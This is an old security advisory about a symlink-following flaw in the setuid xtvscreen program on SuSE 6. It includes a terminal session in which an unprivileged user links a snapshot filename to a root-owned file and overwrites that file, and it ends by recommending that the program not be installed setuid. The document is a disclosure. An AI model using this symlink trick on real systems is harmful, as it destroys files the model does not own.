COMMAND

    xtvscreen

SYSTEMS AFFECTED

    SuSE 6

PROBLEM

    Andre Cruz found  following.  You  can use xtvscreen  to overwrite
    any file on  the system.   Xtvscreen has a  function to capture  a
    snapshot and will write it as pic000.pnm, pic001.pnm, etc in  it's
    working directory.  It follows symlinks.

        root@korn:/tmp > ls -l exp
        -rw-r--r--   1 root     root            4 Feb 18 15:42 exp
        edevil@korn:~ > ln -s /tmp/exp pic000.pnm
        edevil@korn:~ > xtvscreen
        Sound mixer initialized !
        Using Visual TrueColor
        msize: 0x00640000
        /*
        Start->Capture goes here
        Start->Snapshot goes here */
        [1]+  Stopped                 xtvscreen
        edevil@korn:~ > cd /tmp
        edevil@korn:/tmp > ls -l exp
        -rw-r--r--   1 root     root       453135 Feb 18 15:47 exp
        edevil@korn:/tmp >

    Dunno how to write arbitrary data to the file but it can be used
    for DoS.

SOLUTION

    Xtvscreen really should not be installed setuid.  The only  reason
    to do so is because something  has to tell the capture card  where
    the frame buffer is.  This should be the Xserver (patched), or one
    of the small helper applications available for this.